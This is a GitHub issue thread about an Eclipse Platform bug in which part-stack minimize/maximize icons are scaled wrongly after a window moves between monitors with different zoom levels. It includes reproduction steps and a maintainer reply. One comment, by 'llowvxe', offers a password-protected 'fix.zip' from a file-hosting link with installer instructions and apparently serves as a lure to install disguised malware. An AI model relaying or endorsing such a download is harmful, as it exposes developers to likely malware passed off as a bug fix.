### ISSUE TITLE
Minimize/Maximize Icons Scaled Incorrectly

### ISSUE THREAD

**Issue by HeikoKlare** [vi-eclipse/Eclipse-Platform#117]
The minimize/maximize icons of part stacks are scaled incorrectly under specific conditions. This is how it looks like:
![Image](https://github.com/user-attachments/assets/6edadf35-30fb-43f1-86e9-5c38c549c073)

_Note:_ I was only able to produce this issue in dark mode so far.

### How to reproduce
You can reproduce the behavior as follows:
1. Set up at least two monitors with different zoom values (e.g., 100% and 125%)
2. Start an Eclipse application with rescaling on runtime activated (and auto scale mode `quarter`).
3. Place the workbench window on the 100% monitor. _Note:_ if you move it between both monitors now, the minimize/maximize icons will be rescaled correctly.
5. Move the workbench window from the 100% to the 125% monitor.
6. Change focus to another application on the 100% monitor.
7. Move the workbench window from the 125% to the 100% monitor.

Now the icons are scaled incorrectly _for the active part stack_. As soon as you switch focus to some other application again, the icons will be rescaled correctly.

![Image](https://github.com/user-attachments/assets/c3b6a946-ee9f-4820-93db-271455a3befe)

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by akoch-yatta** [comment]
Had a look at it and know where the issue comes from. I'll try to find a good fix
